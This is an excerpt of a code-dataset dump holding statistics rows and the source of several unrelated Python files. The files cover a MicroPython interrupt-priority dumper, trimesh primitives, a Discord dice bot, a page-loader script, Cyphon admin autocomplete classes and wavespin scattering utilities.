| 29.27 | 178 | 0.686197 | 808 | 5,854 | 4.730198 | 0.221535 | 0.057561 | 0.032967 | 0.041863 | 0.333595 | 0.249084 | 0.181057 | 0.128728 | 0.10675 | 0.10675 | 0 | 0.013685 | 0.138709 | 5,854 | 199 | 179 | 29.417085 | 0.744347 | 0.064742 | 0 | 0.155039 | 0 | 0 | 0.124931 | 0.025463 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.007752 | 0.062016 | 0 | 0.069767 | 0.108527 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e771901cac33122ea8a46bf698c48b3de96e015e | 886 | py | Python | nvic.py | dhylands/upy-examples | 90cca32f0c6c65c33967da9ac1a998e731c60d91 | [
"MIT"
] | 78 | 2015-01-15T23:24:21.000Z | 2022-02-25T09:24:58.000Z | nvic.py | dhylands/upy-examples | 90cca32f0c6c65c33967da9ac1a998e731c60d91 | [
"MIT"
] | 1 | 2015-02-04T00:51:52.000Z | 2015-02-04T00:51:52.000Z | nvic.py | dhylands/upy-examples | 90cca32f0c6c65c33967da9ac1a998e731c60d91 | [
"MIT"
] | 26 | 2015-02-03T21:26:33.000Z | 2022-02-21T02:57:46.000Z | import machine
SCS = 0xE000E000
SCB = SCS + 0x0D00
NVIC = SCS + 0x0100
VTOR = SCB + 0x08
SCB_SHP = SCB + 0x18
NVIC_PRIO = NVIC + 0x300
def dump_nvic():
print('NVIC_PRIO = {:08x} @ {:08x}'.format(machine.mem32[NVIC_PRIO], NVIC_PRIO))
print('VTOR = {:08x} @ {:08x}'.format(machine.mem32[VTOR], VTOR))
print('System IRQs')
for i in range(12):
irq = -(16 - (i + 4))
prio = machine.mem8[SCB_SHP + i] >> 4
if prio > 0:
print('{:3d}:{:d}'.format(irq, prio))
print('Regular IRQs')
for irq in range(80):
prio = machine.mem8[NVIC_PRIO + irq] >> 4
if prio > 0:
print('{:3d}:{:d}'.format(irq, prio))
def nvic_set_prio(irq, prio):
if irq < 0:
idx = (irq & 0x0f) - 4
machine.mem8[SCB_SHP + idx] = prio << 4
else:
machine.mem8[NVIC_PRIO + irq] = prio << 4
dump_nvic()
| 23.945946 | 84 | 0.546275 | 127 | 886 | 3.708661 | 0.322835 | 0.101911 | 0.050955 | 0.080679 | 0.318471 | 0.123142 | 0.123142 | 0.123142 | 0.123142 | 0.123142 | 0 | 0.096215 | 0.284424 | 886 | 36 | 85 | 24.611111 | 0.646688 | 0 | 0 | 0.142857 | 0 | 0 | 0.109481 | 0 | 0 | 0 | 0.044018 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.035714 | 0 | 0.107143 | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e772c6aaf22ad97381e12d6d2154f737e40ff951 | 9,152 | py | Python | trimesh/primitives.py | maganrobotics/UR3e-manipulation | ceaf650b1a811d0bfc3baf175d353fc7f4a33522 | [
"MIT"
] | null | null | null | trimesh/primitives.py | maganrobotics/UR3e-manipulation | ceaf650b1a811d0bfc3baf175d353fc7f4a33522 | [
"MIT"
] | null | null | null | trimesh/primitives.py | maganrobotics/UR3e-manipulation | ceaf650b1a811d0bfc3baf175d353fc7f4a33522 | [
"MIT"
] | null | null | null | import numpy as np
from . import util
from . import points
from . import creation
from .base import Trimesh
from .constants import log
from .triangles import windings_aligned
class Primitive(Trimesh):
'''
Geometric primitives which are a subclass of Trimesh.
Mesh is generated lazily when vertices or faces are requested.
'''
def __init__(self, *args, **kwargs):
super(Primitive, self).__init__(*args, **kwargs)
self._data.clear()
self._validate = False
@property
def faces(self):
stored = self._cache['faces']
if util.is_shape(stored, (-1,3)):
return stored
self._create_mesh()
#self._validate_face_normals()
return self._cache['faces']
@faces.setter
def faces(self, values):
log.warning('Primitive faces are immutable! Not setting!')
@property
def vertices(self):
stored = self._cache['vertices']
if util.is_shape(stored, (-1,3)):
return stored
self._create_mesh()
return self._cache['vertices']
@vertices.setter
def vertices(self, values):
if values is not None:
log.warning('Primitive vertices are immutable! Not setting!')
@property
def face_normals(self):
stored = self._cache['face_normals']
if util.is_shape(stored, (-1,3)):
return stored
self._create_mesh()
return self._cache['face_normals']
@face_normals.setter
def face_normals(self, values):
if values is not None:
log.warning('Primitive face normals are immutable! Not setting!')
def _create_mesh(self):
raise ValueError('Primitive doesn\'t define mesh creation!')
class Sphere(Primitive):
def __init__(self, *args, **kwargs):
'''
Create a Sphere primitive, which is a subclass of Trimesh.
Arguments
----------
sphere_radius: float, radius of sphere
sphere_center: (3,) float, center of sphere
subdivisions: int, number of subdivisions for icosphere. Default is 3
'''
super(Sphere, self).__init__(*args, **kwargs)
if 'sphere_radius' in kwargs:
self.sphere_radius = kwargs['sphere_radius']
if 'sphere_center' in kwargs:
self.sphere_center = kwargs['sphere_center']
if 'subdivisions' in kwargs:
self._data['subdivisions'] = int(kwargs['subdivisions'])
else:
self._data['subdivisions'] = 3
self._unit_sphere = creation.icosphere(subdivisions=self._data['subdivisions'])
@property
def sphere_center(self):
stored = self._data['center']
if stored is None:
return np.zeros(3)
return stored
@sphere_center.setter
def sphere_center(self, values):
self._data['center'] = np.asanyarray(values, dtype=np.float64)
@property
def sphere_radius(self):
stored = self._data['radius']
if stored is None:
return 1.0
return stored
@sphere_radius.setter
def sphere_radius(self, value):
self._data['radius'] = float(value)
def _create_mesh(self):
ico = self._unit_sphere
self._cache['vertices'] = ((ico.vertices * self.sphere_radius) +
self.sphere_center)
self._cache['faces'] = ico.faces
self._cache['face_normals'] = ico.face_normals
class Box(Primitive):
def __init__(self, *args, **kwargs):
'''
Create a Box primitive, which is a subclass of Trimesh
Arguments
----------
box_extents: (3,) float, size of box
box_transform: (4,4) float, transformation matrix for box
box_center: (3,) float, convience function which updates box_transform
with a translation- only matrix
'''
super(Box, self).__init__(*args, **kwargs)
if 'box_extents' in kwargs:
self.box_extents = kwargs['box_extents']
if 'box_transform' in kwargs:
self.box_transform = kwargs['box_transform']
if 'box_center' in kwargs:
self.box_center = kwargs['box_center']
self._unit_box = creation.box()
@property
def box_center(self):
return self.box_transform[0:3,3]
@box_center.setter
def box_center(self, values):
transform = self.box_transform
transform[0:3,3] = values
self._data['box_transform'] = transform
@property
def box_extents(self):
stored = self._data['box_extents']
if util.is_shape(stored, (3,)):
return stored
return np.ones(3)
@box_extents.setter
def box_extents(self, values):
self._data['box_extents'] = np.asanyarray(values, dtype=np.float64)
@property
def box_transform(self):
stored = self._data['box_transform']
if util.is_shape(stored, (4,4)):
return stored
return np.eye(4)
@box_transform.setter
def box_transform(self, matrix):
matrix = np.asanyarray(matrix, dtype=np.float64)
if matrix.shape != (4,4):
raise ValueError('Matrix must be (4,4)!')
self._data['box_transform'] = matrix
@property
def is_oriented(self):
if util.is_shape(self.box_transform, (4,4)):
return not np.allclose(self.box_transform[0:3,0:3], np.eye(3))
else:
return False
def _create_mesh(self):
log.debug('Creating mesh for box primitive')
box = self._unit_box
vertices, faces, normals = box.vertices, box.faces, box.face_normals
vertices = points.transform_points(vertices * self.box_extents,
self.box_transform)
normals = np.dot(self.box_transform[0:3,0:3],
normals.T).T
aligned = windings_aligned(vertices[faces[:1]], normals[:1])[0]
if not aligned:
faces = np.fliplr(faces)
# for a primitive the vertices and faces are derived from other information
# so it goes in the cache, instead of the datastore
self._cache['vertices'] = vertices
self._cache['faces'] = faces
self._cache['face_normals'] = normals
class Extrusion(Primitive):
def __init__(self, *args, **kwargs):
'''
Create an Extrusion primitive, which subclasses Trimesh
Arguments
----------
extrude_polygon: shapely.geometry.Polygon, polygon to extrude
extrude_transform: (4,4) float, transform to apply after extrusion
extrude_height: float, height to extrude polygon by
'''
super(Extrusion, self).__init__(*args, **kwargs)
if 'extrude_polygon' in kwargs:
self.extrude_polygon = kwargs['extrude_polygon']
if 'extrude_transform' in kwargs:
self.extrude_transform = kwargs['extrude_transform']
if 'extrude_height' in kwargs:
self.extrude_height = kwargs['extrude_height']
@property
def extrude_transform(self):
stored = self._data['extrude_transform']
if np.shape(stored) == (4,4):
return stored
return np.eye(4)
@extrude_transform.setter
def extrude_transform(self, matrix):
matrix = np.asanyarray(matrix, dtype=np.float64)
if matrix.shape != (4,4):
raise ValueError('Matrix must be (4,4)!')
self._data['extrude_transform'] = matrix
@property
def extrude_height(self):
stored = self._data['extrude_height']
if stored is None:
raise ValueError('extrude height not specified!')
return stored.copy()[0]
@extrude_height.setter
def extrude_height(self, value):
self._data['extrude_height'] = float(value)
@property
def extrude_polygon(self):
stored = self._data['extrude_polygon']
if stored is None:
raise ValueError('extrude polygon not specified!')
return stored[0]
@extrude_polygon.setter
def extrude_polygon(self, value):
polygon = creation.validate_polygon(value)
self._data['extrude_polygon'] = polygon
@property
def extrude_direction(self):
direction = np.dot(self.extrude_transform[:3,:3],
[0.0,0.0,1.0])
return direction
def slide(self, distance):
distance = float(distance)
translation = np.eye(4)
translation[2,3] = distance
new_transform = np.dot(self.extrude_transform.copy(),
translation.copy())
self.extrude_transform = new_transform
def _create_mesh(self):
log.debug('Creating mesh for extrude primitive')
mesh = creation.extrude_polygon(self.extrude_polygon,
self.extrude_height)
mesh.apply_transform(self.extrude_transform)
self._cache['vertices'] = mesh.vertices
self._cache['faces'] = mesh.faces
self._cache['face_normals'] = mesh.face_normals
| 33.52381 | 87 | 0.605114 | 1,065 | 9,152 | 5.010329 | 0.130516 | 0.028486 | 0.026237 | 0.023613 | 0.285045 | 0.20521 | 0.192841 | 0.165105 | 0.119003 | 0.10401 | 0 | 0.011515 | 0.288352 | 9,152 | 272 | 88 | 33.647059 | 0.807769 | 0.116149 | 0 | 0.253731 | 0 | 0.004975 | 0.11385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.164179 | false | 0 | 0.034826 | 0.004975 | 0.328358 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7742de3e4510356f7231d426f247a622c865b21 | 1,923 | py | Python | discordbot.py | asamii0006/discordpy-startup | 3a14a4155373fff96067954e85ad64658e4bbbf5 | [
"MIT"
] | null | null | null | discordbot.py | asamii0006/discordpy-startup | 3a14a4155373fff96067954e85ad64658e4bbbf5 | [
"MIT"
] | null | null | null | discordbot.py | asamii0006/discordpy-startup | 3a14a4155373fff96067954e85ad64658e4bbbf5 | [
"MIT"
] | null | null | null | from discord.ext import commands
import os
import traceback
bot = commands.Bot(command_prefix='/')
token = os.environ['DISCORD_BOT_TOKEN']
@bot.event
async def on_command_error(ctx, error):
orig_error = getattr(error, "original", error)
error_msg = ''.join(traceback.TracebackException.from_exception(orig_error).format())
await ctx.send(error_msg)
@bot.command()
async def hello(ctx):
await ctx.send('こんちゃ~す')
bot.run(token)
# coding: utf-8
import random
import re
pattern = '\d{1,2}d\d{1,3}|\d{1,2}D\d{1,3}'
split_pattern = 'd|D'
# 対象の文字列かどうか
def judge_nDn(src):
repatter = re.compile(pattern)
result = repatter.fullmatch(src)
if result is not None:
return True
elif src == '1d114514' or src == '1D114514':
return True
return False
# 何面ダイスを何回振るか
def split_nDn(src):
return re.split(split_pattern,src)
# ダイスを振る
def role_nDn(src):
result = []
sum_dice = 0
role_index = split_nDn(src)
role_count = int(role_index[0])
nDice = int(role_index[1])
for i in range(role_count):
tmp = random.randint(1,nDice)
result.append(tmp)
sum_dice = sum_dice + tmp
is1dice = True if role_count == 1 else False
return result,sum_dice,is1dice
def nDn(text):
if judge_nDn(text):
result,sum_dice,is1dice = role_nDn(text)
if is1dice:
return 'ダイス:' + text + '\n出目:' + str(sum_dice)
else:
return 'ダイス:' + text + '\n出目:' + str(result) + '\n合計:' + str(sum_dice)
else:
return None
import discord
import nDnDICE
client = discord.Client()
@client.event
async def on_ready():
print('Botを起動しました。')
@client.event
async def on_message(message):
msg = message.content
result = nDnDICE.nDn(msg)
if result is not None:
await client.send_message(message.channel, result)
#ここにbotのアクセストークンを入力
client.run('DISCORD_BOT_TOKEN')
| 22.103448 | 89 | 0.651586 | 272 | 1,923 | 4.474265 | 0.345588 | 0.040263 | 0.032046 | 0.036976 | 0.130649 | 0.011504 | 0.011504 | 0 | 0 | 0 | 0 | 0.021448 | 0.224129 | 1,923 | 86 | 90 | 22.360465 | 0.794236 | 0.031721 | 0 | 0.129032 | 0 | 0.016129 | 0.071659 | 0.016703 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.112903 | 0.016129 | 0.306452 | 0.016129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7765cf07995f7e47b792bf00a9c30793c228c4a | 1,604 | py | Python | filling/parse/ex.py | nvxden/flask-films | 038f4bcaa7feabdfff7662fb1048bf48515e5c26 | [
"MIT"
] | null | null | null | filling/parse/ex.py | nvxden/flask-films | 038f4bcaa7feabdfff7662fb1048bf48515e5c26 | [
"MIT"
] | null | null | null | filling/parse/ex.py | nvxden/flask-films | 038f4bcaa7feabdfff7662fb1048bf48515e5c26 | [
"MIT"
] | null | null | null | import asyncio as aio
import os
import re
from aiohttp import ClientSession
from pageloader import LoadPageTask, PageLoader
from nvxlira import Lira
from nvxaex import Executor
############################################################
# class
class LoadPage(LoadPageTask):
def __str__(self):
return self.filename
############################################################
# lira
lira = Lira('data.bin', 'head.bin')
if len(lira['load-page']) == 0 and len(lira['load-page-done']) == 0:
for url in [
'http://www.world-art.ru/cinema/cinema.php?id=65021',
'http://www.world-art.ru/cinema/cinema.php?id=17190',
'http://www.world-art.ru/cinema/cinema.php?id=36896',
'http://www.world-art.ru/cinema/cinema.php?id=547',
'http://www.world-art.ru/cinema/cinema.php?id=50952'
]:
task = LoadPage(url=url, filename='works/' + re.search('id=(\d+)', url).group(1) + '.html')
lira.put(task, cat='load-page')
print('Not done:')
for task in [ lira.get(id) for id in lira['load-page'] ]:
print(task)
print('Done:')
for task in [ lira.get(id) for id in lira['load-page-done'] ]:
print(task)
############################################################
# main
async def main():
async with ClientSession() as session:
loader = PageLoader(session, silent=False)
ex = Executor(lira, loader, silent=False)
await ex.extasks('load-page', 'load-page-done')
return
############################################################
# run
try: os.mkdir('works')
except: pass
aio.run(main())
del lira
############################################################
# END
| 20.831169 | 93 | 0.545511 | 204 | 1,604 | 4.269608 | 0.377451 | 0.064294 | 0.068886 | 0.086108 | 0.289323 | 0.289323 | 0.289323 | 0.289323 | 0.289323 | 0.094145 | 0 | 0.018532 | 0.125312 | 1,604 | 76 | 94 | 21.105263 | 0.602281 | 0.014963 | 0 | 0.054054 | 0 | 0 | 0.298273 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.027027 | 0.189189 | 0.027027 | 0.297297 | 0.108108 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e776bec5c2d6010767a894ee51a22e9c4a498c74 | 5,803 | py | Python | Incident-Response/Tools/cyphon/cyphon/contexts/autocomplete_light_registry.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 1 | 2021-07-24T17:22:50.000Z | 2021-07-24T17:22:50.000Z | Incident-Response/Tools/cyphon/cyphon/contexts/autocomplete_light_registry.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-28T03:40:31.000Z | 2022-02-28T03:40:52.000Z | Incident-Response/Tools/cyphon/cyphon/contexts/autocomplete_light_registry.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-25T08:34:51.000Z | 2022-03-16T17:29:44.000Z | # -*- coding: utf-8 -*-
# Copyright 2017-2019 ControlScan, Inc.
#
# This file is part of Cyphon Engine.
#
# Cyphon Engine is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Cyphon Engine is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cyphon Engine. If not, see <http://www.gnu.org/licenses/>.
"""
Defines Autocomplete models for use in admin pages for the Contexts app.
"""
# third party
import autocomplete_light.shortcuts as autocomplete_light
# local
from distilleries.models import Distillery
from utils.choices.choices import get_operator_choices, get_field_type
from .models import Context
class FilterValueFieldsByFocalDistillery(autocomplete_light.AutocompleteListBase):
"""
Defines autocomplete rules for the value_field on the Context admin
page.
"""
choices = ()
attrs = {
'data-autocomplete-minimum-characters': 0,
'placeholder': 'select a distillery and click to see options...'
}
def choices_for_request(self):
"""
Overrides the choices_for_request method of the AutocompleteListBase
class. Filters options based on the selected primary_distillery.
"""
choices = self.choices
distillery_id = self.request.GET.get('primary_distillery', None)
if distillery_id:
distillery = Distillery.objects.get(pk=distillery_id)
choices = distillery.get_field_list()
return self.order_choices(choices)[0:self.limit_choices]
class FilterSearchFieldsByRelatedDistillery(autocomplete_light.AutocompleteListBase):
"""
Defines autocomplete rules for the value_field on the Context admin
page.
"""
choices = ()
attrs = {
'data-autocomplete-minimum-characters': 0,
'placeholder': 'select a related distillery and click to see options...'
}
def choices_for_request(self):
"""
Overrides the choices_for_request method of the AutocompleteListBase
class. Filters options based on the selected related_distillery.
"""
choices = self.choices
distillery_id = self.request.GET.get('related_distillery', None)
if distillery_id:
distillery = Distillery.objects.get(pk=distillery_id)
choices = distillery.get_field_list()
return self.order_choices(choices)[0:self.limit_choices]
class FilterValueFieldsByContext(autocomplete_light.AutocompleteListBase):
"""
Defines autocomplete rules for the value_field on the ContextFilter
admin page.
"""
choices = ()
attrs = {
'data-autocomplete-minimum-characters': 0,
'placeholder': 'select a distillery and click to see options...'
}
def choices_for_request(self):
"""
Overrides the choices_for_request method of the AutocompleteListBase
class. Filters options based on the primary_distillery of the selected
Context.
"""
choices = self.choices
context_id = self.request.GET.get('context', None)
if context_id:
context = Context.objects.select_related('primary_distillery')\
.get(pk=context_id)
choices = context.primary_distillery.get_field_list()
return self.order_choices(choices)[0:self.limit_choices]
class FilterSearchFieldsByContext(autocomplete_light.AutocompleteListBase):
"""
Defines autocomplete rules for the value_field on the ContextFilter
admin page.
"""
choices = ()
attrs = {
'data-autocomplete-minimum-characters': 0,
'placeholder': 'select a distillery and click to see options...'
}
def choices_for_request(self):
"""
Overrides the choices_for_request method of the AutocompleteListBase
class. Filters options based on the related_distillery of the
selected Context.
"""
choices = self.choices
context_id = self.request.GET.get('context', None)
if context_id:
context = Context.objects.select_related('related_distillery')\
.get(pk=context_id)
choices = context.related_distillery.get_field_list()
return self.order_choices(choices)[0:self.limit_choices]
class FilterOperatorsBySearchField(autocomplete_light.AutocompleteChoiceListBase):
"""
Defines autocomplete rules for the operator field on the ContextFilter
admin page.
"""
choices = ()
attrs = {
'data-autocomplete-minimum-characters': 0,
'placeholder': 'select a search field and click to see options...'
}
def choices_for_request(self):
"""
Overrides the choices_for_request method of the AutocompleteListBase
class. Filters options based on the selected search_field.
"""
choices = self.choices
search_field = self.request.GET.get('search_field', None)
if search_field:
field_type = get_field_type(search_field)
choices = get_operator_choices(field_type)
return self.order_choices(choices)[0:self.limit_choices]
autocomplete_light.register(FilterValueFieldsByFocalDistillery)
autocomplete_light.register(FilterSearchFieldsByRelatedDistillery)
autocomplete_light.register(FilterValueFieldsByContext)
autocomplete_light.register(FilterSearchFieldsByContext)
autocomplete_light.register(FilterOperatorsBySearchField)
| 33.16 | 85 | 0.697398 | 652 | 5,803 | 6.064417 | 0.211656 | 0.051593 | 0.042994 | 0.034143 | 0.643146 | 0.628983 | 0.61482 | 0.595599 | 0.595599 | 0.583966 | 0 | 0.004449 | 0.225401 | 5,803 | 174 | 86 | 33.350575 | 0.875195 | 0.31656 | 0 | 0.592105 | 0 | 0 | 0.157322 | 0.048993 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065789 | false | 0 | 0.052632 | 0 | 0.381579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e77966df213ba660b9ceebdaefcb943c9ce395a4 | 33,959 | py | Python | wavespin/scattering1d/utils.py | OverLordGoldDragon/dev_tg | 1e06b89c1b0b5e95d9c53fda2efd02e41f708718 | [
"MIT"
] | 2 | 2020-03-28T05:37:34.000Z | 2020-09-17T20:02:21.000Z | wavespin/scattering1d/utils.py | OverLordGoldDragon/dev_tg | 1e06b89c1b0b5e95d9c53fda2efd02e41f708718 | [
"MIT"
] | 2 | 2020-06-02T17:52:53.000Z | 2020-09-18T00:46:34.000Z | wavespin/scattering1d/utils.py | OverLordGoldDragon/dev_tg | 1e06b89c1b0b5e95d9c53fda2efd02e41f708718 | [
"MIT"
] | 1 | 2020-06-02T17:52:24.000Z | 2020-06-02T17:52:24.000Z | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2022- John Muradeli
#
# Distributed under the terms of the MIT License
# (see wavespin/__init__.py for details)
# -----------------------------------------------------------------------------
import numpy as np
import math
from .filter_bank import (calibrate_scattering_filters, compute_temporal_support,
compute_minimum_required_length, gauss_1d, morlet_1d)
def compute_border_indices(log2_T, J, i0, i1):
"""
Computes border indices at all scales which correspond to the original
signal boundaries after padding.
At the finest resolution,
original_signal = padded_signal[..., i0:i1].
This function finds the integers i0, i1 for all temporal subsamplings
by 2**J, being conservative on the indices.
Maximal subsampling is by `2**log2_T` if `average=True`, else by
`2**max(log2_T, J)`. We compute indices up to latter to be sure.
Parameters
----------
log2_T : int
Maximal subsampling by low-pass filtering is `2**log2_T`.
J : int / tuple[int]
Maximal subsampling by band-pass filtering is `2**J`.
i0 : int
start index of the original signal at the finest resolution
i1 : int
end index (excluded) of the original signal at the finest resolution
Returns
-------
ind_start, ind_end: dictionaries with keys in [0, ..., log2_T] such that the
original signal is in padded_signal[ind_start[j]:ind_end[j]]
after subsampling by 2**j
References
----------
This is a modification of
https://github.com/kymatio/kymatio/blob/master/kymatio/scattering1d/utils.py
Kymatio, (C) 2018-present. The Kymatio developers.
"""
if isinstance(J, tuple):
J = max(J)
ind_start = {0: i0}
ind_end = {0: i1}
for j in range(1, max(log2_T, J) + 1):
ind_start[j] = (ind_start[j - 1] // 2) + (ind_start[j - 1] % 2)
ind_end[j] = (ind_end[j - 1] // 2) + (ind_end[j - 1] % 2)
return ind_start, ind_end
def compute_padding(J_pad, N):
"""
Computes the padding to be added on the left and on the right
of the signal.
It should hold that 2**J_pad >= N
Parameters
----------
J_pad : int
2**J_pad is the support of the padded signal
N : int
original signal support size
Returns
-------
pad_left: amount to pad on the left ("beginning" of the support)
pad_right: amount to pad on the right ("end" of the support)
References
----------
This is a modification of
https://github.com/kymatio/kymatio/blob/master/kymatio/scattering1d/utils.py
Kymatio, (C) 2018-present. The Kymatio developers.
"""
N_pad = 2**J_pad
if N_pad < N:
raise ValueError('Padding support should be larger than the original '
'signal size!')
to_add = 2**J_pad - N
pad_right = to_add // 2
pad_left = to_add - pad_right
return pad_left, pad_right
def compute_minimum_support_to_pad(N, J, Q, T, criterion_amplitude=1e-3,
normalize='l1', r_psi=math.sqrt(0.5),
sigma0=1e-1, alpha=4., P_max=5, eps=1e-7,
pad_mode='reflect'):
"""
Computes the support to pad given the input size and the parameters of the
scattering transform.
Parameters
----------
N : int
temporal size of the input signal
J : int
scale of the scattering
Q : int >= 1
The number of first-order wavelets per octave. Defaults to `1`.
If tuple, sets `Q = (Q1, Q2)`, where `Q2` is the number of
second-order wavelets per octave (which defaults to `1`).
- If `Q1==0`, will exclude `psi1_f` from computation.
- If `Q2==0`, will exclude `psi2_f` from computation.
T : int
temporal support of low-pass filter, controlling amount of imposed
time-shift invariance and maximum subsampling
normalize : string / tuple[string], optional
Normalization convention for the filters (in the temporal domain).
Supports 'l1', 'l2', 'l1-energy', 'l2-energy', but only 'l1' or 'l2' is
used. See `help(Scattering1D)`.
criterion_amplitude: float `>0` and `<1`, optional
Represents the numerical error which is allowed to be lost after
convolution and padding.
The larger criterion_amplitude, the smaller the padding size is.
Defaults to `1e-3`
r_psi : float, optional
Should be `>0` and `<1`. Controls the redundancy of the filters
(the larger r_psi, the larger the overlap between adjacent
wavelets).
Defaults to `sqrt(0.5)`.
sigma0 : float, optional
parameter controlling the frequential width of the
low-pass filter at J_scattering=0; at a an absolute J_scattering,
it is equal to :math:`\\frac{\\sigma_0}{2^J}`.
Defaults to `1e-1`.
alpha : float, optional
tolerance factor for the aliasing after subsampling.
The larger the alpha, the more conservative the value of maximal
subsampling is.
Defaults to `5`.
P_max : int, optional
maximal number of periods to use to make sure that the Fourier
transform of the filters is periodic.
`P_max = 5` is more than enough for double precision.
Defaults to `5`.
eps : float, optional
required machine precision for the periodization (single
floating point is enough for deep learning applications).
Defaults to `1e-7`.
pad_mode : str
Name of padding used. If 'zero', will halve `min_to_pad`, else no effect.
Returns
-------
min_to_pad: int
minimal value to pad the signal on one size to avoid any
boundary error.
"""
# compute params for calibrating, & calibrate
Q1, Q2 = Q if isinstance(Q, tuple) else (Q, 1)
Q_temp = (max(Q1, 1), max(Q2, 1)) # don't pass in zero
N_init = N
# `None` means `xi_min` is limitless. Since this method is used to compute
# padding, then we can't know what it is, so we compute worst case.
# If `max_pad_factor=None`, then the realized filterbank's (what's built)
# `xi_min` is also limitless. Else, it'll be greater, depending on
# `max_pad_factor`.
J_pad = None
sigma_low, xi1, sigma1, j1s, _, xi2, sigma2, j2s, _ = \
calibrate_scattering_filters(J, Q_temp, T, r_psi=r_psi, sigma0=sigma0,
alpha=alpha, J_pad=J_pad)
# split `normalize` into orders
if isinstance(normalize, tuple):
normalize1, normalize2 = normalize
else:
normalize1 = normalize2 = normalize
# compute psi1_f with greatest time support, if requested
if Q1 >= 1:
psi1_f_fn = lambda N: morlet_1d(N, xi1[-1], sigma1[-1],
normalize=normalize1, P_max=P_max, eps=eps)
# compute psi2_f with greatest time support, if requested
if Q2 >= 1:
psi2_f_fn = lambda N: morlet_1d(N, xi2[-1], sigma2[-1],
normalize=normalize2, P_max=P_max, eps=eps)
# compute lowpass
phi_f_fn = lambda N: gauss_1d(N, sigma_low, normalize=normalize1,
P_max=P_max, eps=eps)
# compute for all cases as psi's time support might exceed phi's
ca = dict(criterion_amplitude=criterion_amplitude)
N_min_phi = compute_minimum_required_length(phi_f_fn, N_init=N_init, **ca)
phi_halfsupport = compute_temporal_support(phi_f_fn(N_min_phi)[None], **ca)
if Q1 >= 1:
N_min_psi1 = compute_minimum_required_length(psi1_f_fn, N_init=N_init,
**ca)
psi1_halfsupport = compute_temporal_support(psi1_f_fn(N_min_psi1)[None],
**ca)
else:
psi1_halfsupport = -1 # placeholder
if Q2 >= 1:
N_min_psi2 = compute_minimum_required_length(psi2_f_fn, N_init=N_init,
**ca)
psi2_halfsupport = compute_temporal_support(psi2_f_fn(N_min_psi2)[None],
**ca)
else:
psi2_halfsupport = -1
# set min to pad based on each
pads = (phi_halfsupport, psi1_halfsupport, psi2_halfsupport)
# can pad half as much
if pad_mode == 'zero':
pads = [p//2 for p in pads]
pad_phi, pad_psi1, pad_psi2 = pads
# set main quantity as the max of all
min_to_pad = max(pads)
# return results
return min_to_pad, pad_phi, pad_psi1, pad_psi2
def compute_meta_scattering(J_pad, J, Q, T, r_psi=math.sqrt(.5), max_order=2):
"""Get metadata on the transform.
This information specifies the content of each scattering coefficient,
which order, which frequencies, which filters were used, and so on.
Parameters
----------
J : int
The maximum log-scale of the scattering transform.
In other words, the maximum scale is given by `2**J`.
Q : int >= 1 / tuple[int]
The number of first-order wavelets per octave. Defaults to `1`.
If tuple, sets `Q = (Q1, Q2)`, where `Q2` is the number of
second-order wavelets per octave (which defaults to `1`).
J_pad : int
2**J_pad == amount of temporal padding
T : int
temporal support of low-pass filter, controlling amount of imposed
time-shift invariance and maximum subsampling
r_psi : float
Filter redundancy.
See `help(wavespin.scattering1d.filter_bank.calibrate_scattering_filters)`.
max_order : int, optional
The maximum order of scattering coefficients to compute.
Must be either equal to `1` or `2`. Defaults to `2`.
Returns
-------
meta : dictionary
A dictionary with the following keys:
- `'order`' : tensor
A Tensor of length `C`, the total number of scattering
coefficients, specifying the scattering order.
- `'xi'` : tensor
